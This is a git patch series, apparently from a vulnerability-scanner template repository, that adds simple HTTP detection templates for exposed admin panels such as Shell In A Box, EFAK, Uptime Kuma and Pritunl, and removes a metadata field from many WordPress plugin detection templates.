http/cves/2022/CVE-2022-46381.yaml:0d3650086fc783ec69e7eb03c03b6e848fa0e68d http/cves/2022/CVE-2022-46888.yaml:0cc89f4123749e7f4f040574e8c9fd9ca5241c2f -http/cves/2022/CVE-2022-46934.yaml:99f135c1210f780663c922fb828316df2de28a33 +http/cves/2022/CVE-2022-46934.yaml:1534d7acdbaca51f94c929e77620a4a3951521b8 http/cves/2022/CVE-2022-47002.yaml:2a52e9dfb99836620dc72e0d13acaedeec67f703 http/cves/2022/CVE-2022-47003.yaml:ce30568b6d57c292d0d0daa27ad5f63a8aec8c67 http/cves/2022/CVE-2022-47945.yaml:ce8863a7cec3df5facb935a0f3c7b08a5cda7d7f @@ -5876,6 +5876,7 @@ http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:8751cd9b769aa5ce http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:9d83d3d1e9839cd45bb507acf04d5411b6bd65cf http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:b5f46181f7b11afdd7cc759db25641d979a5fa55 http/vulnerabilities/joomla/rusty-joomla.yaml:76f06e5c2b46da8f788aae181896f4c183561a4c +http/vulnerabilities/kkfileview-ssrf.yaml:c92bd9cba0f534f2ce8e06e6a2e12b8661a9ddab http/vulnerabilities/laravel/laravel-ignition-xss.yaml:fd56462c0bdacebacebb940221b72661268ccc64 http/vulnerabilities/linkerd/linkerd-ssrf.yaml:dfe6bc7b2dbed477b9e577df220cd814551e11c3 http/vulnerabilities/magento/magento-2-exposed-api.yaml:a6ca4bb40cabe0e7a896f24484575ca0ec8a0ab8 @@ -6482,7 +6483,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:1695b04ffa967a3c26813b38d1ff22c4ff12a671 +templates-checksum.txt:ca292448de9ef71abd0514760d7b8c70ab3d90f6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From f4f9f58cee43a9c99f0c3b2d154d7f70d3d0f519 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 23:07:52 +0530 Subject: [PATCH 265/609] Create shell-box.yaml --- http/exposed-panels/shell-box.yaml | 33 ++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/shell-box.yaml diff --git a/http/exposed-panels/shell-box.yaml b/http/exposed-panels/shell-box.yaml new file mode 100644 index 0000000000..fb925f3725 --- /dev/null +++ b/http/exposed-panels/shell-box.yaml @@ -0,0 +1,33 @@ +id: shell-box + +info: + name: Shell In A Box - Detect + author: irshad ahamed + severity: info + description: | + Shell In A Box implements a web server that can export arbitrary command line tools to a web based terminal emulator + reference: + - https://github.com/shellinabox/shellinabox + - https://www.cvedetails.com/vulnerability-list/vendor_id-15771/product_id-33062/Shellinabox-Project-Shellinabox.html + metadata: + verified: true + shodan-query: http.favicon.hash:-629968763 + max-request: 1 + tags: shell,emulator,detect,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'Shell In A Box' + + - type: status + status: + - 200 From 47ddc7278a9d6f4b2ba4e1b16f2ce9348b4eb0e4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 23:14:31 +0530 Subject: [PATCH 266/609] trail space fix --- http/exposed-panels/shell-box.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/shell-box.yaml b/http/exposed-panels/shell-box.yaml index fb925f3725..7bee6f3a66 100644 --- a/http/exposed-panels/shell-box.yaml +++ b/http/exposed-panels/shell-box.yaml @@ -26,7 +26,7 @@ http: matchers: - type: word words: - - 'Shell In A Box' + - 'Shell In A Box' - type: status status: From 9d4cfc3e8b3c6f1d91c9127e1f296c56675a0aca Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 23:21:09 +0530 Subject: [PATCH 267/609] Create efak-panel.yaml --- http/exposed-panels/efak-panel.yaml | 31 +++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/efak-panel.yaml diff --git a/http/exposed-panels/efak-panel.yaml b/http/exposed-panels/efak-panel.yaml new file mode 100644 index 0000000000..ac14c775c7 --- /dev/null +++ b/http/exposed-panels/efak-panel.yaml @@ -0,0 +1,31 @@ +id: efak-panel + +info: + name: Eagle For Apache Kakfa Login - Panel + author: irshad ahamed + severity: info + description: | + EFAK is a visualization and management software that allows one to query, visualize, alert on, and explore their metrics wherever they were stored. + reference: + - https://github.com/smartloli/efak + - https://www.kafka-eagle.org/ + metadata: + verified: true + shodan-query: http.favicon.hash:1693580324 + max-request: 1 + tags: efak,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}/account/signin?/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Login - EFAK' + + - type: status + status: + - 200 From 800acb56bc63347899976170a06d877a9e6a505e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 23:27:16 +0530 Subject: [PATCH 268/609] Create uptime-kuma-panel.yaml --- http/exposed-panels/uptime-kuma-panel.yaml | 31 ++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/uptime-kuma-panel.yaml diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml new file mode 100644 index 0000000000..fa60d28d71 --- /dev/null +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -0,0 +1,31 @@ +id: uptime-kuma-panel + +info: + name: Uptime Kuma - Panel + author: irshad ahamed + severity: info + description: | + Realtime website and application monitoring tool + reference: + - https://github.com/louislam/uptime-kuma + - https://uptime.kuma.pet/docs/ + metadata: + verified: true + shodan-query: title:"Uptime Kuma" + max-request: 1 + tags: uptime,kuma,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}/dashboard" + + matchers-condition: and + matchers: + - type: word + words: + - 'Uptime Kuma' + + - type: status + status: + - 200 From b9d107e6969953fe9f33633ae80cd9e4702b1704 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 23:33:13 +0530 Subject: [PATCH 269/609] Create pritunl-panel.yaml --- http/exposed-panels/pritunl-panel.yaml | 31 ++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/pritunl-panel.yaml diff --git a/http/exposed-panels/pritunl-panel.yaml b/http/exposed-panels/pritunl-panel.yaml new file mode 100644 index 0000000000..4a02bb2aae --- /dev/null +++ b/http/exposed-panels/pritunl-panel.yaml @@ -0,0 +1,31 @@ +id: pritunl-panel + +info: + name: Pritunl - Panel + author: irshad ahamed + severity: info + description: | + Realtime website and application monitoring tool + reference: + - https://github.com/louislam/uptime-kuma + - https://uptime.kuma.pet/docs/ + metadata: + verified: true + shodan-query: title:"Pritunl" + max-request: 1 + tags: pritunl,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + words: + - 'Pritunl' + + - type: status + status: + - 200 From 2c786207908767b0ad2d53850d51111ce7f484b8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 04:02:09 +0000 Subject: [PATCH 270/609] Auto WordPress Plugins Update [Sun Jul 2 04:02:09 UTC 2023] :robot: --- helpers/wordpress/plugins/wp-rollback.txt | 1 + .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-404-redirect-to-homepage.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/astra-widgets.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - .../wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../wordpress/plugins/easy-fancybox.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-and-footer-scripts.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - .../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/iwp-client.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/loginpress.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/photo-gallery.yaml | 1 - .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-builder.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../wordpress/plugins/svg-support.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../plugins/themeisle-companion.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - .../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/use-any-font.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../plugins/velvet-blues-update-urls.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - ...merce-gateway-paypal-express-checkout.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 1 - ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 49 +++++++++++++++++++ .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wp-user-avatar.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - 201 files changed, 50 insertions(+), 199 deletions(-) create mode 100644 helpers/wordpress/plugins/wp-rollback.txt create mode 100644 http/technologies/wordpress/plugins/wp-rollback.yaml diff --git a/helpers/wordpress/plugins/wp-rollback.txt b/helpers/wordpress/plugins/wp-rollback.txt new file mode 100644 index 0000000000..bbf649f614 --- /dev/null +++ b/helpers/wordpress/plugins/wp-rollback.txt @@ -0,0 +1 @@ +1.7.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ 